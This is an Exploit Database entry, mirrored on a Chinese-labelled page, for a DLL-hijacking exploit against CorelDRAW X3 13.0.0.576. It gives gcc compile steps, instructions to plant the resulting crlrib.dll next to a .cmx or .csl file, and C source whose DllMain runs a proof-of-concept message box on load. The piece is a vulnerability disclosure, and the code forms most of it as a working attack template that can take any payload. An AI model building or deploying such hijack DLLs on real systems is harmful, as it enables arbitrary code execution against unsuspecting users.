CorelDRAW X3 13.0.0.576 – ‘crlrib.dll’ DLL Hijacking

• Exploit Database
• 143 阅读

• 作者： LiquidWorm
  日期： 2010-08-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14786/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59

  /*   CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit   Vendor: Corel Corporation Product Web Page: http://www.corel.com Affected Version: X3 v13.0.0.576   Summary: Graphic design software for striking visual communication.   Desc: CorelDRAW X3 suffers from a dll hijacking vulnerability that enables the attacker to execute arbitrary code on a local level. The vulnerable extensions are .cmx and .csl thru crlrib.dll library.   ---- gcc -shared -o crlrib.dll coreldrw.c   Compile and rename to crlrib.dll, create a file test.cmx or test.csl and put both files in same dir and execute. ----   Tested on Microsoft Windows XP Professional SP3 (EN)       Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic liquidworm gmail com   Zero Science Lab - http://www.zeroscience.mk     25.08.2010   */     #include <windows.h>   BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {   switch (fdwReason) { case DLL_PROCESS_ATTACH: dll_mll(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; }   return TRUE; }   int dll_mll() { MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK); }